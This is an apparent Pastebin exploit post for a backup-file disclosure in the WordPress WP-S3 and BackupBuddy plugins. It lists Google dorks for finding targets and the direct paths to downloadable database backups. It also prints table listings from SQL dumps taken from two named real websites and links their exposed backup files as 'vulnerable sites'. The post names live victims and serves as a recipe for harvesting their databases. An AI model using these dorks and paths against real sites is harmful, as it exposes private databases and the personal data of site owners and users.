KingSkrupellos

WordPress Ithemes-BackupBuddy Amazon WP-S3 Plugins 2.9 Vuln

Dec 16th, 2018
78
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.70 KB | None | 0 0
  1. #################################################################################################
  2.  
  3. # Exploit Title : WordPress Ithemes-BackupBuddy Amazon WP-S3 Plugins 2.9 Database Backup Disclosure
  4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
  5. # Date : 17/12/2018
  6. # Vendor Homepage : ithemes.com/purchase/backupbuddy/ ~ wordpress.org/plugins/wp-s3/
  7. # Software Download Link : downloads.wordpress.org/plugin/wp-s3.1.5.zip
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Version Information : WP-S3 1.5 Version - Ithemes-BackupBuddy 2.9 Version
  11. # Exploit Risk : Medium
  12. # Google Dorks : inurl:''/wp-content/uploads/wp-s3-database-backup.sql''
  13. + intext:''Powered by Shopify''
  14. + intext:© 2018, Holy Sparks Jewish Art & Books For Spiritual & Personal Development Powered by Shopify''
  15. + intext:''2015 © ALL RIGHTS RESERVED BY THE-SCHMIDT''
  16. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
  17. CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
  18. CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
  19.  
  20. #################################################################################################
  21.  
  22. WordPress Amazon S3 Plugin 1.5 and WordPress Ithemes-BackupBuddy 2.9
  23.  
  24. #################################################################################################
  25.  
  26. # Admin Panel Login Path :
  27.  
  28. /wp-login.php
  29.  
  30. # Exploit :
  31.  
  32. /wp-content/uploads/wp-s3-database-backup.sql
  33.  
  34. /wp-content/uploads/wp-s3-backups.zip
  35.  
  36. #################################################################################################
  37.  
  38. # Example SQL Dump Some Informations and Tables Names => holysparks.org
  39.  
  40. -- MySQL dump 10.13 Distrib 5.1.58, for unknown-linux-gnu (x86_64)
  41. --
  42. -- Host: localhost Database: raeshaga_wrd1
  43. -- ------------------------------------------------------
  44. -- Server version 5.1.58-community-log
  45.  
  46. -- Table structure for table `wp_StreamPad_Tracks`
  47.  
  48. -- Dumping data for table `wp_StreamPad_Tracks`
  49.  
  50. -- Table structure for table `wp_affiliates_banners_tbl`
  51.  
  52. -- Dumping data for table `wp_affiliates_banners_tbl`
  53.  
  54. -- Table structure for table `wp_affiliates_clickthroughs_tbl`
  55.  
  56. -- Dumping data for table `wp_affiliates_clickthroughs_tbl`
  57.  
  58. -- Table structure for table `wp_affiliates_leads_tbl`
  59.  
  60. -- Dumping data for table `wp_affiliates_leads_tbl`
  61.  
  62. -- Table structure for table `wp_affiliates_payouts_tbl`
  63.  
  64. -- Dumping data for table `wp_affiliates_payouts_tbl`
  65.  
  66. -- Table structure for table `wp_affiliates_sales_tbl`
  67.  
  68. -- Dumping data for table `wp_affiliates_sales_tbl`
  69.  
  70. -- Table structure for table `wp_affiliates_tbl`
  71.  
  72. -- Dumping data for table `wp_affiliates_tbl`
  73.  
  74. -- Table structure for table `wp_commentmeta`
  75.  
  76. -- Dumping data for table `wp_commentmeta`
  77.  
  78. -- Table structure for table `wp_comments`
  79.  
  80. -- Dumping data for table `wp_comments`
  81.  
  82. -- Table structure for table `wp_contact_form_7`
  83.  
  84. -- Dumping data for table `wp_contact_form_7`
  85.  
  86. -- Table structure for table `wp_ft_wpecards`
  87.  
  88. -- Dumping data for table `wp_ft_wpecards`
  89.  
  90. -- Table structure for table `wp_links`
  91.  
  92. -- Dumping data for table `wp_links`
  93.  
  94. -- Table structure for table `wp_options`
  95.  
  96. -- Dumping data for table `wp_options`
  97.  
  98. -- Dump completed....
  99.  
  100. ################################################################################################
  101.  
  102. # Example SQL Dump Informations and Tables Names => the-schmidt.com
  103.  
  104. -- MySQL dump 10.13 Distrib 5.1.60, for unknown-linux-gnu (x86_64)
  105. --
  106. -- Host: localhost Database: theschm1_blog
  107. -- ------------------------------------------------------
  108. -- Server version 5.1.60-community-log
  109.  
  110. -- Table structure for table `wp_PluginManager`
  111.  
  112. -- Dumping data for table `wp_PluginManager`
  113.  
  114. -- Table structure for table `wp_custom_fonts`
  115.  
  116. -- Dumping data for table `wp_custom_fonts`
  117.  
  118. -- Table structure for table `wp_cvg_gallery`
  119.  
  120. -- Dumping data for table `wp_cvg_gallery`
  121.  
  122. -- Table structure for table `wp_cvg_videos`
  123.  
  124. -- Dumping data for table `wp_cvg_videos`
  125.  
  126. -- Table structure for table `wp_download_status`
  127.  
  128. -- Dumping data for table `wp_download_status`
  129.  
  130. -- Table structure for table `wp_fancybox`
  131.  
  132. -- Dumping data for table `wp_fancybox`
  133.  
  134. -- Table structure for table `wp_item_category_associations`
  135.  
  136. -- Dumping data for table `wp_item_category_associations`
  137.  
  138. -- Table structure for table `wp_links`
  139.  
  140. -- Dumping data for table `wp_links`
  141.  
  142. -- Table structure for table `wp_ngg_album`
  143.  
  144. -- Dumping data for table `wp_ngg_album`
  145.  
  146. -- Table structure for table `wp_ngg_gallery`
  147.  
  148. -- Dumping data for table `wp_ngg_gallery`
  149.  
  150. -- Table structure for table `wp_ngg_pictures`
  151.  
  152. -- Dumping data for table `wp_ngg_pictures`
  153.  
  154. -- Table structure for table `wp_also_bought_product`
  155.  
  156. -- Dumping data for table `wp_also_bought_product`
  157.  
  158. -- Table structure for table `wp_blc_filters`
  159.  
  160. -- Dumping data for table `wp_blc_filters`
  161.  
  162. -- Table structure for table `wp_blc_instances`
  163.  
  164. -- Dumping data for table `wp_blc_instances`
  165.  
  166. -- Table structure for table `wp_blc_links`
  167.  
  168. -- Dumping data for table `wp_blc_links`
  169.  
  170. -- Table structure for table `wp_options`
  171.  
  172. -- Dumping data for table `wp_options`
  173.  
  174. -- Dump completed...
  175.  
  176. #################################################################################################
  177.  
  178. # Example Vulnerable Sites =>
  179.  
  180. [+] holysparks.org/wp-content/uploads/wp-s3-database-backup.sql
  181.  
  182. [+] the-schmidt.com/blog/wp-content/uploads/wp-s3-database-backup.sql
  183.  
  184. #################################################################################################
  185.  
  186. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  187.  
  188. #################################################################################################
Add Comment
Please, Sign In to add comment